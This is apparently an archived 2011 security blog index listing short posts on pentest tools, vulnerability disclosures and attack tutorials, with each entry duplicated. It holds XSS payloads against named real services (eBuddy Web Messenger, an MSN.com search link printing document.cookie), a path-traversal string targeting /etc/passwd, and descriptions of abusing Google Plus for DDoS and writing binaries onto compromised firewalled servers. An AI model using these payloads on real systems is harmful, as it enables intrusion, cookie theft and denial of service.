... neuere Einträge
Saturday, 3. September 2011
Vulnerability Master 1.0 - Scanner
Am Saturday, 3. Sep 2011 im Topic 'Pentest'
Cookies - Tell You Who You Are
Am Saturday, 3. Sep 2011 im Topic 'Tutorials'
With the success of Web applications, most of our data is now stored on various third-party servers where they are processed to deliver personalized services.
Download PDF
http://arxiv.org/PS_cache/arxiv/pdf/1108/1108.5864v1.pdf
by
Vincent Toubiana Vincent Verdot
Download PDF
http://arxiv.org/PS_cache/arxiv/pdf/1108/1108.5864v1.pdf
by
Vincent Toubiana Vincent Verdot
Friday, 2. September 2011
Step by Step guide for LFI (Local File Inclusion)
Am Friday, 2. Sep 2011 im Topic 'Tutorials'
This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).
Source
http://pastebin.com/ssSAVmcR
by
Amarjit Singh
Source
http://pastebin.com/ssSAVmcR
by
Amarjit Singh
eBuddy Web Messenger - XSS
Am Friday, 2. Sep 2011 im Topic 'Vulnerabilities'
eBuddy Web Messenger suffers from an encoded-Persistent XSS vulnerability in the messaging function. (while sendingA message with embedded code to another authorized user in eBuddy WebMessenger).
Exploit example
Plain XSS (Not going to store, nor execute)
alert('eBuddy Persistent XSS');
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.
[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.
by
Warv0x
Exploit example
Plain XSS (Not going to store, nor execute)
alert('eBuddy Persistent XSS');
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.
[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.
by
Warv0x
The Hacker News Magazine September Issue
Am Friday, 2. Sep 2011 im Topic 'Books change the World'
1. Access to computers should be unlimited and total.
2. All information should be free.
3. Authority should be mistrusted and decentralization promoted.
4. Hackers should be judged solely by their skills at hacking, rather than by race, class, age, gender, or position.
5. Computers can be used to create art and beauty.
6. Computers can change your life for the better.
The understanding of “Hacker Ethics” has three main functions:
1. It promotes the belief of individual activity over any form of corporate authority or system of ideals.
2. It supports a completely free-market approach to the exchange of and access to information.
3. It promotes the belief that computers can have a beneficial and life-changing effect.
Download
http://theevilhackerz.com/THN-Sep2011.rar
2. All information should be free.
3. Authority should be mistrusted and decentralization promoted.
4. Hackers should be judged solely by their skills at hacking, rather than by race, class, age, gender, or position.
5. Computers can be used to create art and beauty.
6. Computers can change your life for the better.
The understanding of “Hacker Ethics” has three main functions:
1. It promotes the belief of individual activity over any form of corporate authority or system of ideals.
2. It supports a completely free-market approach to the exchange of and access to information.
3. It promotes the belief that computers can have a beneficial and life-changing effect.
Download
http://theevilhackerz.com/THN-Sep2011.rar
Thursday, 1. September 2011
China - proxies
Am Thursday, 1. Sep 2011 im Topic 'Web Security'
Analysing Android .Apk Files With Agnitio
Am Thursday, 1. Sep 2011 im Topic 'Android'
Qubes OS
Am Thursday, 1. Sep 2011 im Topic 'Tools'
Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers. In the future it might also run Windows apps.
Download/Installation
http://wiki.qubes-os.org/trac/wiki/InstallationGuide
Download/Installation
http://wiki.qubes-os.org/trac/wiki/InstallationGuide
XCode Scanning tool
Am Thursday, 1. Sep 2011 im Topic 'Pentest'
XCode SQLi/LFI/XSS and Webshell Scanning tool
XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.
Example
in dorks add
* /../../../../../../../../../../../../. . / .. / etc / passwd% 00 “> alert (” XSS Xcode Exploit Scanner detected “)
Output
www.target.com?blabla.php?=1234: SQLi Vulnerable.
Download
http://www.ziddu.com/download/16226093/XCodeExploitScannerSept2011.zip.html
XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.
Example
in dorks add
* /../../../../../../../../../../../../. . / .. / etc / passwd% 00 “> alert (” XSS Xcode Exploit Scanner detected “)
Output
www.target.com?blabla.php?=1234: SQLi Vulnerable.
Download
http://www.ziddu.com/download/16226093/XCodeExploitScannerSept2011.zip.html
Tuesday, 30. August 2011
Mobius Forensic Toolkit 0.5.9 - Linux
Am Tuesday, 30. Aug 2011 im Topic 'Computer Forensics'
Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.
Download
http://freshmeat.net/projects/mobiusft
Installation
As root, type:
python setup.py install
Usage
Run mobius_bin.py.
Download
http://freshmeat.net/projects/mobiusft
Installation
As root, type:
python setup.py install
Usage
Run mobius_bin.py.
x64 XOR Shellcode Encoder / Loader - Perl
Am Tuesday, 30. Aug 2011 im Topic 'Source Code'
Read these first:
www.klake.org/~jt/encoder/
www.security-assessment.com/Presentations/BM_Brightstar_2004.ppt
These didnt do what I wanted, aka work on x64 etc, so I did a
_much_ more basic (using as/ld/objdump) one to do what I wanted...
Source
http://pastebin.com/jL5egjZe
by
lucifer
www.klake.org/~jt/encoder/
www.security-assessment.com/Presentations/BM_Brightstar_2004.ppt
These didnt do what I wanted, aka work on x64 etc, so I did a
_much_ more basic (using as/ld/objdump) one to do what I wanted...
Source
http://pastebin.com/jL5egjZe
by
lucifer
slowhttptest - Linux
Am Tuesday, 30. Aug 2011 im Topic 'Tools'
Slow HTTP DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Installation and usage examples
http://code.google.com/p/slowhttptest/wiki/InstallationAndUsage
How to run and tune Apache Range DoS vulnerability test
http://code.google.com/p/slowhttptest/wiki/ApacheRangeTest
Download
http://code.google.com/p/slowhttptest/downloads/list
Installation and usage examples
http://code.google.com/p/slowhttptest/wiki/InstallationAndUsage
How to run and tune Apache Range DoS vulnerability test
http://code.google.com/p/slowhttptest/wiki/ApacheRangeTest
Download
http://code.google.com/p/slowhttptest/downloads/list
Monday, 29. August 2011
srgn-file2text
Am Monday, 29. Aug 2011 im Topic 'Tools'
It converts a binary file to text and then is possible to recreate the binary file from text on server which has no internet access.
Download
http://www.surgeonix.com/blog/downloads/srgn-file2text-v2.1.exe
Source
http://www.surgeonix.com/blog/downloads/srgn-file2text-v2.1.cpp
Tuto
http://securityxploit.blogger.de/stories/1877012/
by
SuRGeoNix
Download
http://www.surgeonix.com/blog/downloads/srgn-file2text-v2.1.exe
Source
http://www.surgeonix.com/blog/downloads/srgn-file2text-v2.1.cpp
Tuto
http://securityxploit.blogger.de/stories/1877012/
by
SuRGeoNix
Creating Binary Files on a Firewalled Server
Am Monday, 29. Aug 2011 im Topic 'Tutorials'
This article introduces techniques that an attacker, who has already access to execute commands on a server, could use to create binary files on server which has no internet access (firewalled) or web filtering (antivirus).
Download PDF
http://www.surgeonix.com/blog/downloads/Creating_Binary_Files_on_a_Firewalled_Server.pdf
by
SuRGeoNix
Download PDF
http://www.surgeonix.com/blog/downloads/Creating_Binary_Files_on_a_Firewalled_Server.pdf
by
SuRGeoNix
DDos via Google Plus Servers
Am Monday, 29. Aug 2011 im Topic 'Source Code'
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. If anything, Google will notice [attack attempts] and probably blacklist you.
Source
http://pastebin.com/2uRGm9jY
by
R00T.ATI
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. If anything, Google will notice [attack attempts] and probably blacklist you.
Source
http://pastebin.com/2uRGm9jY
by
R00T.ATI
MSN.com - XSS
Am Monday, 29. Aug 2011 im Topic 'Vulnerabilities'
XSS Vulnerability (Cross Site Scripting) in MSN.
Vulnerable Link:
http://glo.msn.com/search?searchTerm=%22%3E%3Cscript%3Ealert(document.cookie)%20;%3C/script%3E
by
TeamDX
Vulnerable Link:
http://glo.msn.com/search?searchTerm=%22%3E%3Cscript%3Ealert(document.cookie)%20;%3C/script%3E
by
TeamDX
... ältere Einträge